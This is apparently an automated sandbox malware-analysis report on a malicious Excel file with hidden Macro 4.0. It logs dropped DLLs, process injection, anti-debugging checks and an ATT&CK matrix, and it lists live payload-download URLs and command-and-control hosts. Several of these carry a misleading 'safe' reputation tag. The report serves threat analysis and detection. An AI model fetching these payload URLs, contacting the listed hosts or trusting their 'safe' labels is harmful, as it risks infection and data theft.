    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023469A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2856Thread sleep time: -240000s >= -30000s
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023469A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0233D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02342EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02410D28 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02410C5E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02410865 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000A2EF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023FA0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Contains functionality to inject code into remote processesShow sources
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0233AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: case (1522).xls, type: SAMPLE
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: msiexec.exe, 00000005.00000002.2361272927.0000000000850000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: msiexec.exe, 00000005.00000002.2361272927.0000000000850000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: msiexec.exe, 00000005.00000002.2361272927.0000000000850000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023F968A cpuid
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_023F95A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02331A00 CreateDialogParamW,GetVersion,
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting4Path InterceptionAccess Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting4Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery35Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    4.2.rundll32.exe.2330000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
    5.2.msiexec.exe.90000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File

    Domains

    SourceDetectionScannerLabelLink
    gadgetswolf.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0%Avira URL Cloudsafe
    https://govemedico.tk/70%Avira URL Cloudsafe
    http://crl3.digicert0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://homesoapmolds.com/post.phpr0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    https://gadgetswolf.com/0%Avira URL Cloudsafe
    https://rnollg.com/kev/scfrd.dll0%Avira URL Cloudsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    https://gadgetswolf.com/post.php0%Avira URL Cloudsafe
    http://crt.comod0%Avira URL Cloudsafe
    https://govemedico.tk/0%Avira URL Cloudsafe
    https://homesoapmolds.com/post.php0%Avira URL Cloudsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://crl3.digicertP0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    https://gadgetswolf.com/post.phpi0%Avira URL Cloudsafe
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~0%Avira URL Cloudsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    https://rnollg.com/kev/scfrd.dll$80%Avira URL Cloudsafe
    https://homesoapmolds.com/0%Avira URL Cloudsafe
    https://gadgetswolf.com/post.php_0%Avira URL Cloudsafe
    https://govemedico.tk/post.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    homesoapmolds.com
    104.21.60.169
    truefalse
      unknown
      rnollg.com
      172.67.150.228
      truefalse
        unknown
        gadgetswolf.com
        172.67.200.147
        truefalseunknown
        govemedico.tk
        104.21.73.69
        truefalse
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)77EE0000.0.drfalse
          • Avira URL Cloud: safe
          unknown
          http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.comrundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpfalse
              high
              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpfalse
                high
                http://crl.entrust.net/server1.crl0msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpfalse
                  high
                  https://govemedico.tk/7msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl3.digicertmsiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net03msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://homesoapmolds.com/post.phprmsiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://gadgetswolf.com/msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://rnollg.com/kev/scfrd.dllbefore.1.0.0.sheet.csv_unpacktrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.diginotar.nl/cps/pkioverheid0msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://gadgetswolf.com/post.phpmsiexec.exe, 00000005.00000003.2168531557.00000000003AA000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crt.comodmsiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://govemedico.tk/msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://homesoapmolds.com/post.phpmsiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpfalse
                    high
                    http://crl3.digicertPmsiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpfalse
                      high
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.msiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmpfalse
                        high
                        http://investor.msn.com/rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmpfalse
                          high
                          http://www.%s.comPAmsiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          https://gadgetswolf.com/post.phpimsiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~case (1522).xlsfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.entrust.net0Dmsiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://rnollg.com/kev/scfrd.dll$8case (1522).xls, 77EE0000.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://secure.comodo.com/CPS0msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                            high
                            https://homesoapmolds.com/msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                              high
                              https://gadgetswolf.com/post.php_msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://govemedico.tk/post.phpmsiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.150.228
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              104.21.60.169
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              172.67.200.147
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              104.21.73.69
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox Version:31.0.0 Emerald
                              Analysis ID:344663
                              Start date:26.01.2021
                              Start time:21:30:59
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 6m 10s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:case (1522).xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.expl.evad.winXLS@7/12@4/4
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 67.8% (good quality ratio 67.4%)
                              • Quality average: 89.5%
                              • Quality standard deviation: 19.2%
                              HCA Information:
                              • Successful, ratio: 84%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xls
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              21:32:15API Interceptor1200x Sleep call for process: msiexec.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              172.67.150.228case (166).xlsGet hashmaliciousBrowse
                                104.21.60.169case (4374).xlsGet hashmaliciousBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  gadgetswolf.comcase (4374).xlsGet hashmaliciousBrowse
                                  • 104.21.44.135
                                  case (166).xlsGet hashmaliciousBrowse
                                  • 104.21.44.135
                                  rnollg.comcase (166).xlsGet hashmaliciousBrowse
                                  • 172.67.150.228
                                  govemedico.tkcase (4374).xlsGet hashmaliciousBrowse
                                  • 172.67.158.184
                                  case (166).xlsGet hashmaliciousBrowse
                                  • 172.67.158.184
                                  homesoapmolds.comcase (4374).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  case (166).xlsGet hashmaliciousBrowse
                                  • 172.67.198.109

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  CLOUDFLARENETUScase (4374).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  case (166).xlsGet hashmaliciousBrowse
                                  • 172.67.198.109
                                  PAYMENT.xlsxGet hashmaliciousBrowse
                                  • 104.16.19.94
                                  PAYMENT.xlsxGet hashmaliciousBrowse
                                  • 104.16.18.94
                                  Informacion.docGet hashmaliciousBrowse
                                  • 104.21.89.78
                                  PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                  • 162.159.133.233
                                  SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  a4iz7zkilq.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  case (547).xlsGet hashmaliciousBrowse
                                  • 104.21.23.220
                                  Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  case (547).xlsGet hashmaliciousBrowse
                                  • 104.21.23.220
                                  nMn5eAMhBy.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  vK6VPijMoq.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  8gom3VEZLS.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  v07PSzmSp9.exeGet hashmaliciousBrowse
                                  • 66.235.200.145
                                  COA for PI#Sc09283,PDF.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  CLOUDFLARENETUScase (4374).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  case (166).xlsGet hashmaliciousBrowse
                                  • 172.67.198.109
                                  PAYMENT.xlsxGet hashmaliciousBrowse
                                  • 104.16.19.94
                                  PAYMENT.xlsxGet hashmaliciousBrowse
                                  • 104.16.18.94
                                  Informacion.docGet hashmaliciousBrowse
                                  • 104.21.89.78
                                  PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                  • 162.159.133.233
                                  SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  a4iz7zkilq.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  case (547).xlsGet hashmaliciousBrowse
                                  • 104.21.23.220
                                  Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  case (547).xlsGet hashmaliciousBrowse
                                  • 104.21.23.220
                                  nMn5eAMhBy.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  vK6VPijMoq.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  8gom3VEZLS.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  v07PSzmSp9.exeGet hashmaliciousBrowse
                                  • 66.235.200.145
                                  COA for PI#Sc09283,PDF.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  CLOUDFLARENETUScase (4374).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  case (166).xlsGet hashmaliciousBrowse
                                  • 172.67.198.109
                                  PAYMENT.xlsxGet hashmaliciousBrowse
                                  • 104.16.19.94
                                  PAYMENT.xlsxGet hashmaliciousBrowse
                                  • 104.16.18.94
                                  Informacion.docGet hashmaliciousBrowse
                                  • 104.21.89.78
                                  PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                  • 162.159.133.233
                                  SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  a4iz7zkilq.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  case (547).xlsGet hashmaliciousBrowse
                                  • 104.21.23.220
                                  Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  case (547).xlsGet hashmaliciousBrowse
                                  • 104.21.23.220
                                  nMn5eAMhBy.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  vK6VPijMoq.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  8gom3VEZLS.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  v07PSzmSp9.exeGet hashmaliciousBrowse
                                  • 66.235.200.145
                                  COA for PI#Sc09283,PDF.exeGet hashmaliciousBrowse
                                  • 104.21.19.200

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  7dcce5b76c8b17472d024758970a406bcase (4374).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (166).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  PAYMENT.xlsxGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (547).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  The Mental Health Center.xlsxGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  SC-TR1167700000.xlsxGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (348).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (426).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (250).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (1447).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (850).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (1543).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case_1581.xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  case (435).xlsGet hashmaliciousBrowse
                                  • 104.21.60.169
                                  • 172.67.150.228
                                  • 172.67.200.147
                                  • 104.21.73.69
                                  INV-LASKUPDF2021.xlsxGet hashmaliciousBrowse
                                  • 104.21.60.169
